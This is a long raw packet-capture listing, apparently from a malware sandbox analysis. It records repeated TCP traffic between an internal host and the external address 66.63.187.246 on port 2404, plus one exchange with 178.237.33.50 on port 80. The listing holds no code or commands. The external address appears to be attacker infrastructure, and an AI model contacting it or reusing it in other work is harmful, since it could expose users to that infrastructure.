                                                                                                  Dec 2, 2024 14:43:22.420135975 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:22.425255060 CET24044978566.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:22.619772911 CET24044978566.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:22.628377914 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:22.670146942 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:22.673918962 CET497852404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:22.685559988 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:22.805506945 CET497852404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:22.805844069 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:22.805897951 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:22.925426960 CET24044978566.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:22.925769091 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.290977955 CET8049793178.237.33.50192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.293852091 CET4979380192.168.2.6178.237.33.50
                                                                                                  Dec 2, 2024 14:43:23.371886969 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.371944904 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.371958971 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.372008085 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:23.372067928 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.372081041 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.372108936 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:23.372123957 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.372164965 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:23.519438982 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.519530058 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.519645929 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:23.523668051 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.523802996 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.523850918 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:23.532124996 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.532242060 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.532294035 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:23.540513992 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.540556908 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.540608883 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:23.582427025 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.582541943 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.585180044 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:23.586579084 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.639036894 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:23.666925907 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.666969061 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.667069912 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:23.671036959 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.672595978 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.672611952 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.672646046 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:23.681157112 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.681216955 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.681232929 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:23.689418077 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.689758062 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:23.730060101 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.730165005 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.730283022 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:23.734180927 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.734276056 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.734333992 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:23.742877960 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.742908001 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.742975950 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:23.751158953 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.751173019 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.751267910 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:23.815753937 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.815855026 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.815959930 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:23.819925070 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.820058107 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.820130110 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:23.828284025 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.828371048 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.828444958 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:23.837373972 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.837711096 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.838881016 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:23.845623016 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.845716000 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.849756956 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:23.853562117 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.853588104 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.853642941 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:23.878211021 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.878245115 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.878319025 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:23.881484032 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.881648064 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.881714106 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:23.887937069 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.890371084 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.890502930 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.890551090 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:23.897315025 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.897439003 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.897514105 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:23.904431105 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.905750990 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:23.962451935 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.962522030 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.962651968 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:23.965585947 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.966654062 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.966720104 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.966772079 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:23.973282099 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.973412991 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.973472118 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:23.979895115 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.979990005 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.980046988 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:23.986210108 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.986262083 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:23.986325979 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.992459059 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.992527962 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:23.992554903 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.998188972 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.998286963 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:23.998337030 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.003927946 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.004029989 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.004682064 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.009728909 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.009768009 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.009830952 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.026103020 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.026206970 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.026257038 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.028595924 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.028636932 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.029156923 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.033453941 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.033508062 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.033540964 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.038095951 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.038155079 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.038193941 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.042970896 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.043018103 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.043109894 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.047810078 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.047847986 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.047892094 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.052995920 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.053057909 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.053087950 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.057595968 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.057637930 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.057672024 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.107665062 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.109939098 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.110042095 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.110086918 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.112035990 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.112153053 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.112201929 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.116456985 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.117866993 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.117913961 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.117985964 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.122210979 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.122251987 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.122256994 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.126616001 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.126672029 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.126674891 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.131012917 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.131057024 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.131063938 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.134929895 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.134974003 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.135018110 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.138961077 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.139000893 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.139009953 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.172864914 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.172915936 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.172921896 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.174527884 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.174571991 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.174657106 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.177855015 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.177905083 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.179100990 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.179163933 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.179214954 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.182607889 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.182665110 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.182723999 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.185734034 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.185810089 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.185858011 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.188837051 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.188958883 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.189008951 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.191988945 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.192116022 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.192162037 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.195209026 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.195343971 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.195389986 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.198533058 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.198823929 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.198877096 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.201586008 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.201699018 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.201741934 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.204588890 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.204691887 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.204732895 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.207707882 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.207875013 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.207920074 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.211033106 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.211098909 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.211167097 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.214138031 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.214236021 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.214282990 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.217365980 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.217443943 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.217495918 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.220390081 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.220479012 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.220541954 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.223615885 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.223674059 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.223728895 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.238234997 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.238274097 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.238379002 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.239085913 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.239196062 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.239236116 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.242034912 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.242057085 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.242104053 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.257483959 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.257505894 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.257597923 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.258718967 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.258816957 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.258867979 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.260889053 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.260967016 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.261018991 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.263725996 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.263784885 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.263839006 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.266493082 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.266601086 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.266652107 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.269282103 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.269335985 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.269387960 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.272006035 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.272258043 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.272311926 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.274749041 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.274827957 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.274878025 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.277544975 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.277625084 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.277668953 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.280308008 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.280426025 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.280466080 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.283113003 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.283221006 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.283260107 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.285974026 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.286087036 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.286123991 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.288877010 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.289028883 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.289077044 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.291444063 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.320348024 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.320405960 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.320420027 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.321525097 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.321583033 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.322459936 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.322554111 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.322601080 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.324742079 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.324841976 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.324882030 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.327486992 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.327547073 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.327599049 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.329973936 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.330041885 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.330081940 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.332552910 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.332670927 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.332719088 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.335053921 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.335164070 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.335211992 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.337439060 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.337574005 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.337620974 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.339886904 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.340019941 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.340065956 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.342181921 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.342272043 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.342319965 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.344544888 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.344661951 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.344710112 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.346750975 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.346844912 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.346884966 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.349003077 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.349097013 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.349143982 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.351176977 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.351267099 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.351310015 CET497922404192.168.2.666.63.187.246
